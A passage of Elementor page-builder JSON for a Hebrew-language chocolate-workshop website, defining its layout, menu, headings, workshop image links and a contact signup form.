widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"376ec0e9\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"2a6711cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"66f452c6\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"label_typography_typography\":\"custom\",\"label_typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"},\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\"